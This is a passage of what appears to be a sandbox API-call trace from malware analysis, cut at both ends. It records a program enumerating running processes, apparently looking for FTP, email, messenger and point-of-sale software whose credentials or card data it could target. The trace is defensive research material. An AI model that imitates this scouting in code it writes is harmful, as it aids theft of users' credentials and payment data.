th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0255.553] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0255.554] CloseHandle (hObject=0x1d14) returned 1 [0255.555] Sleep (dwMilliseconds=0x64) [0255.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0255.697] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.702] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0255.703] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0255.705] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.706] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0255.707] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0255.709] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0255.710] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0255.711] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0255.713] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.717] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.718] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0255.720] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.721] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.723] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.724] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.725] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.727] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.728] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.761] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0255.763] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0255.764] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0255.766] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.767] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.768] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0255.770] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0255.771] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0255.772] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0255.774] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.775] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0255.779] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0255.781] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0255.782] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0255.783] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0255.785] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0255.786] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0255.787] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0255.789] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0255.790] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0255.791] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0255.795] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0255.797] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0255.798] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0255.799] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0255.801] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0255.802] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0255.803] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0255.805] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0255.806] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0255.871] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0255.873] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0255.874] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0255.876] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0255.877] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0255.878] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0255.880] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0255.881] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0255.882] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0255.884] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0255.886] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0255.887] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0255.889] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0255.891] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0255.892] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0255.895] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0255.897] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0255.900] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0255.903] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0255.906] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0255.909] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0255.912] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0255.915] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0256.020] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0256.036] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0256.045] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0256.059] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0256.066] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0256.068] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0256.070] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0256.073] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0256.075] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0256.076] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0256.078] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, 